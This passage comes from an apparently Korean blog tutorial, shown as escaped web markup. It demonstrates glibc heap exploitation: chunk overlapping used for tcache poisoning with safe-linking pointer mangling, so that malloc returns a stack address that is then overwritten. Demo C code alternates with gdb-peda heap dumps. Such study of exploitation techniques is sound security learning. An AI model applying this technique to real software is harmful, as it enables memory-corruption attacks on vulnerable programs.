victim->next<\/code> \ud3ec\uc778\ud130\ub97c \uc81c\uc5b4\ud569\ub2c8\ub2e4.<\/li>\n<\/ol>\n\n\n\n puts(\"Now we have the chunk overlapping primitive:\");\n puts(\"This primitive will allow directly reading\/writing objects, heap metadata, etc.\\n\");\n puts(\"Below will use the chunk overlapping primitive to perform a tcache poisoning attack.\");\n\n puts(\"Get the overlapping chunk from the unsorted bin.\");\n intptr_t *unsorted = malloc(0x100 + 0x100 + 0x10);\n puts(\"Use the overlapping chunk to control victim->next pointer.\");\n \/\/ mangle the pointer since glibc 2.32\n unsorted[0x110\/sizeof(intptr_t)] = ((long)a >> 12) ^ (long)stack_var;<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Used None None\n0x5555555593a0 0x0 0x110 Used None None\n0x5555555594b0 0x0 0x110 Used None None\n0x5555555595c0 0x0 0x110 Used None None\n0x5555555596d0 0x0 0x110 Used None None\n0x5555555597e0 0x0 0x110 Used None None\n0x5555555598f0 0x0 0x110 Used None None\n0x555555559a00 0x0 0x220 Used None None\n0x555555559c20 0x220 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x110) tcache_entry[15](7): 0x555555559b20 --> 0x7fffffffe030 --> 0xadfffffff8 (invaild memory)\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-61-1024x697.png\")
<\/figure>\n\n\n\n8.<\/h3>\n\n\n\n
\uc774\ub807\uac8c \ud558\uba74 target\uc774 tcache \ub9e8 \uc704\uc5d0 \uc704\uce58\ud558\uac8c \ub429\ub2c8\ub2e4.<\/p>\n\n\n\n puts(\"Get back victim chunk from tcache. This will put target to tcache top.\");\n a = malloc(0x100);\n int a_size = a[-1] & 0xff0;\n printf(\"victim @ %p, size: %#x, end @ %p\\n\", a, a_size, (void *)a+a_size);<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Used None None\n0x5555555593a0 0x0 0x110 Used None None\n0x5555555594b0 0x0 0x110 Used None None\n0x5555555595c0 0x0 0x110 Used None None\n0x5555555596d0 0x0 0x110 Used None None\n0x5555555597e0 0x0 0x110 Used None None\n0x5555555598f0 0x0 0x110 Used None None\n0x555555559a00 0x0 0x220 Used None None\n0x555555559c20 0x220 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x110) tcache_entry[15](6): 0x7fffffffe030 --> 0xadfffffff8 (invaild memory)\ngdb-peda$<\/pre>\n\n\n\n
![\"\"](\"https:\/\/h4ck.kr\/wp-content\/uploads\/2025\/05\/image-62-1024x659.png\")
<\/figure>\n\n\n\n9.<\/h3>\n\n\n\n
\uac00\uc838\uc624\uba74, \uc2a4\ud0dd \ubc94\uc704\uc758 \uc8fc\uc18c\ub85c \ud560\ub2f9\ubc1b\uac8c \ub418\uba70, 0xcafebabe \uac12\uc744 \uc368\ubd05\ub2c8\ub2e4.<\/p>\n\n\n\n puts(\"Get the target chunk from tcache.\");\n intptr_t *target = malloc(0x100);\n target[0] = 0xcafebabe;\n\n printf(\"target @ %p == stack_var @ %p\\n\", target, stack_var);\n assert(stack_var[0] == 0xcafebabe);\n return 0;\n}<\/pre>\n\n\n\n
Get the target chunk from tcache.\ntarget @ 0x7fffffffe030 == stack_var @ 0x7fffffffe030<\/pre>\n\n\n\n
gdb-peda$ parseheap\naddr prev size status fd bk \n0x555555559000 0x0 0x290 Used None None\n0x555555559290 0x0 0x110 Used None None\n0x5555555593a0 0x0 0x110 Used None None\n0x5555555594b0 0x0 0x110 Used None None\n0x5555555595c0 0x0 0x110 Used None None\n0x5555555596d0 0x0 0x110 Used None None\n0x5555555597e0 0x0 0x110 Used None None\n0x5555555598f0 0x0 0x110 Used None None\n0x555555559a00 0x0 0x220 Used None None\n0x555555559c20 0x220 0x20 Used None None\ngdb-peda$ heapinfo\n(0x20) fastbin[0]: 0x0\n(0x30) fastbin[1]: 0x0\n(0x40) fastbin[2]: 0x0\n(0x50) fastbin[3]: 0x0\n(0x60) fastbin[4]: 0x0\n(0x70) fastbin[5]: 0x0\n(0x80) fastbin[6]: 0x0\n(0x90) fastbin[7]: 0x0\n(0xa0) fastbin[8]: 0x0\n(0xb0) fastbin[9]: 0x0\n top: 0x555555559c40 (size : 0x203c0)\n last_remainder: 0x0 (size : 0x0)\n unsortbin: 0x0\n(0x110) tcache_entry[15](5): 0xadfffffff8 (invaild memory)\ngdb-peda$<\/pre>\n","protected":false},"excerpt":{"rendered":"